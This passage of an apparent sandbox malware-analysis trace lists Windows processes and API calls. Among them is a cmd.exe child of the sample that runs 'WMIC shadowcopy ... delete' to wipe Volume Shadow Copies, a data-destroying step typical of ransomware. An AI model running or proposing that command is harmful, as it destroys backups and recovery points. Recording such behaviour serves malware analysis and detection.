lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 14 os_tid = 0xb50 Thread: id = 15 os_tid = 0xb54 Thread: id = 16 os_tid = 0xb68 Thread: id = 17 os_tid = 0xb64 Thread: id = 18 os_tid = 0xb60 Thread: id = 19 os_tid = 0xb74 Thread: id = 20 os_tid = 0xb70 Thread: id = 21 os_tid = 0xb78 Thread: id = 22 os_tid = 0xb6c Thread: id = 23 os_tid = 0x618 Thread: id = 24 os_tid = 0xad8 Thread: id = 25 os_tid = 0xadc Thread: id = 26 os_tid = 0x320 Thread: id = 27 os_tid = 0x6cc Thread: id = 28 os_tid = 0x42c Thread: id = 29 os_tid = 0x1e4 Thread: id = 30 os_tid = 0x760 Thread: id = 31 os_tid = 0x75c Thread: id = 32 os_tid = 0x74c Thread: id = 33 os_tid = 0x710 Thread: id = 34 os_tid = 0x6d0 Thread: id = 35 os_tid = 0x6bc Thread: id = 36 os_tid = 0x6b8 Thread: id = 37 os_tid = 0x6b0 Thread: id = 38 os_tid = 0x6a8 Thread: id = 39 os_tid = 0x69c Thread: id = 40 os_tid = 0x698 Thread: id = 41 os_tid = 0x684 Thread: id = 42 os_tid = 0x678 Thread: id = 43 os_tid = 0x4a8 Thread: id = 44 os_tid = 0x46c Thread: id = 45 os_tid = 0x44c Thread: id = 46 os_tid = 0x424 Thread: id = 47 os_tid = 0x420 Thread: id = 48 os_tid = 0x41c Thread: id = 49 os_tid = 0x404 Thread: id = 50 os_tid = 0x14c Thread: id = 51 os_tid = 0x158 Thread: id = 52 os_tid = 0x3fc Thread: id = 53 os_tid = 0x3f4 Thread: id = 54 os_tid = 0x3e8 Thread: id = 55 os_tid = 0x39c Thread: id = 56 os_tid = 0x390 Thread: id = 57 os_tid = 0x38c Thread: id = 58 os_tid = 0x388 Thread: id = 59 os_tid = 0x37c Thread: id = 60 os_tid = 0x374 Thread: id = 265 os_tid = 0xaa4 Thread: id = 277 os_tid = 0xa24 Thread: id = 278 os_tid = 0xb1c Thread: id = 279 os_tid = 0xb2c Thread: id = 280 os_tid = 0x544 Thread: id = 281 os_tid = 0x788 Thread: id = 282 os_tid = 0x97c Thread: id = 283 os_tid = 0x6c0 Thread: id = 284 os_tid = 0xb38 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5fb6c000" os_pid = "0xa28" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00041433" [0xc000000f] Thread: id = 61 os_tid = 0xb24 Thread: id = 62 os_tid = 0xa50 Thread: id = 63 os_tid = 0xa48 Thread: id = 64 os_tid = 0xa44 Thread: id = 65 os_tid = 0xa40 Thread: id = 66 os_tid = 0xa3c Thread: id = 67 os_tid = 0xa38 Thread: id = 68 os_tid = 0xa34 Thread: id = 69 os_tid = 0xa30 Thread: id = 70 os_tid = 0xa2c Thread: id = 222 os_tid = 0xaa0 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61c67000" os_pid = "0x9e0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 71 os_tid = 0xb20 Thread: id = 72 os_tid = 0xa00 Thread: id = 73 os_tid = 0x9fc Thread: id = 74 os_tid = 0x9f8 Thread: id = 75 os_tid = 0x9f4 Thread: id = 76 os_tid = 0x9f0 Thread: id = 77 os_tid = 0x9ec Thread: id = 78 os_tid = 0x9e8 Thread: id = 79 os_tid = 0x9e4 Thread: id = 266 os_tid = 0xb10 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x3fe23000" os_pid = "0x598" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b090" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 80 os_tid = 0x7b0 Thread: id = 81 os_tid = 0x290 [0070.300] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfd8a0 | out: lpSystemTimeAsFileTime=0xcfd8a0*(dwLowDateTime=0x33b94330, dwHighDateTime=0x1d68245)) [0070.300] GetCurrentProcessId () returned 0x598 [0070.300] GetCurrentThreadId () returned 0x290 [0070.300] GetTickCount () returned 0x11485f2 [0070.300] QueryPerformanceCounter (in: lpPerformanceCount=0xcfd8a8 | out: lpPerformanceCount=0xcfd8a8*=19019287888) returned 1 [0070.300] malloc (_Size=0x100) returned 0x28e80 Thread: id = 82 os_tid = 0x70c Thread: id = 83 os_tid = 0x534 Thread: id = 84 os_tid = 0xc0 Thread: id = 85 os_tid = 0x57c Thread: id = 86 os_tid = 0x780 Thread: id = 101 os_tid = 0x488 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 87 os_tid = 0xa8c Thread: id = 88 os_tid = 0x768 Thread: id = 89 os_tid = 0x764 Thread: id = 90 os_tid = 0x758 Thread: id = 91 os_tid = 0x724 Thread: id = 92 os_tid = 0x718 Thread: id = 93 os_tid = 0x714 Thread: id = 94 os_tid = 0x630 Thread: id = 95 os_tid = 0x154 Thread: id = 96 os_tid = 0x150 Thread: id = 97 os_tid = 0x120 Thread: id = 98 os_tid = 0x124 Thread: id = 99 os_tid = 0x118 Thread: id = 100 os_tid = 0xf0 Thread: id = 214 os_tid = 0x6b8 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3f529000" os_pid = "0x10c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b50e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 102 os_tid = 0x5ac Thread: id = 103 os_tid = 0x5d4 Thread: id = 104 os_tid = 0x5dc Thread: id = 105 os_tid = 0x15c Thread: id = 106 os_tid = 0x7ac Thread: id = 107 os_tid = 0x208 Thread: id = 185 os_tid = 0xa64 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x338c9000" os_pid = "0x7ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0x634 [0073.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef770 | out: lpSystemTimeAsFileTime=0x2ef770*(dwLowDateTime=0x3546c8d0, dwHighDateTime=0x1d68245)) [0073.460] GetCurrentProcessId () returned 0x7ec [0073.460] GetCurrentThreadId () returned 0x634 [0073.460] GetTickCount () returned 0x1149020 [0073.460] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef778 | out: lpPerformanceCount=0x2ef778*=19335282069) returned 1 [0073.461] GetModuleHandleW (lpModuleName=0x0) returned 0x4a8c0000 [0073.461] __set_app_type (_Type=0x1) [0073.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8e7810) returned 0x0 [0073.462] __getmainargs (in: _Argc=0x4a90a608, _Argv=0x4a90a618, _Env=0x4a90a610, _DoWildCard=0, _StartInfo=0x4a8ee0f4 | out: _Argc=0x4a90a608, _Argv=0x4a90a618, _Env=0x4a90a610) returned 0 [0073.462] GetCurrentThreadId () returned 0x634 [0073.462] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x634) returned 0x3c [0073.463] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0073.463] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0073.463] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0073.463] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.463] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef708 | out: phkResult=0x2ef708*=0x0) returned 0x2 [0073.463] VirtualQuery (in: lpAddress=0x2ef6f0, lpBuffer=0x2ef670, dwLength=0x30 | out: lpBuffer=0x2ef670*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.463] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef670, dwLength=0x30 | out: lpBuffer=0x2ef670*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.463] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef670, dwLength=0x30 | out: lpBuffer=0x2ef670*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.463] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2ef670, dwLength=0x30 | out: lpBuffer=0x2ef670*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.463] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef670, dwLength=0x30 | out: lpBuffer=0x2ef670*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.463] GetConsoleOutputCP () returned 0x1b5 [0073.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8fbfe0 | out: lpCPInfo=0x4a8fbfe0) returned 1 [0073.464] SetConsoleCtrlHandler (HandlerRoutine=0x4a8e3184, Add=1) returned 1 [0073.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0073.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8ee194 | out: lpMode=0x4a8ee194) returned 1 [0073.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0073.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0073.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8ee198 | out: lpMode=0x4a8ee198) returned 1 [0073.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0073.465] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0073.465] GetEnvironmentStringsW () returned 0x458b90* [0073.465] GetProcessHeap () returned 0x440000 [0073.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa7c) returned 0x459620 [0073.465] FreeEnvironmentStringsW (penv=0x458b90) returned 1 [0073.465] GetProcessHeap () returned 0x440000 [0073.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x8) returned 0x458a10 [0073.465] GetEnvironmentStringsW () returned 0x458b90* [0073.465] GetProcessHeap () returned 0x440000 [0073.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa7c) returned 0x45a0b0 [0073.465] FreeEnvironmentStringsW (penv=0x458b90) returned 1 [0073.466] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee5c8 | out: phkResult=0x2ee5c8*=0x44) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x18, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x1, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x1, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x0, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x40, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x40, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x40, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.466] RegCloseKey (hKey=0x44) returned 0x0 [0073.466] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee5c8 | out: phkResult=0x2ee5c8*=0x44) returned 0x0 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x40, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.466] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x1, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.467] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x1, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.467] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x0, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.467] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x9, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.467] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x4, lpData=0x2ee5e0*=0x9, lpcbData=0x2ee5c4*=0x4) returned 0x0 [0073.467] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee5c0, lpData=0x2ee5e0, lpcbData=0x2ee5c4*=0x1000 | out: lpType=0x2ee5c0*=0x0, lpData=0x2ee5e0*=0x9, lpcbData=0x2ee5c4*=0x1000) returned 0x2 [0073.467] RegCloseKey (hKey=0x44) returned 0x0 [0073.467] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517431 [0073.467] srand (_Seed=0x5f517431) [0073.467] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" [0073.467] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" [0073.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8fc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.467] GetProcessHeap () returned 0x440000 [0073.467] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x45ab40 [0073.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x45ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0073.468] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0073.468] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0073.468] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0073.468] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0073.468] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0073.468] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0073.468] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0073.468] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0073.468] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0073.468] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0073.468] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0073.468] GetProcessHeap () returned 0x440000 [0073.468] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x459620 | out: hHeap=0x440000) returned 1 [0073.468] GetEnvironmentStringsW () returned 0x458b90* [0073.468] GetProcessHeap () returned 0x440000 [0073.468] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa94) returned 0x45ad60 [0073.468] FreeEnvironmentStringsW (penv=0x458b90) returned 1 [0073.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0073.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0073.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0073.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0073.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0073.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0073.469] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0073.469] _wcsicmp (_String1="KEYS", 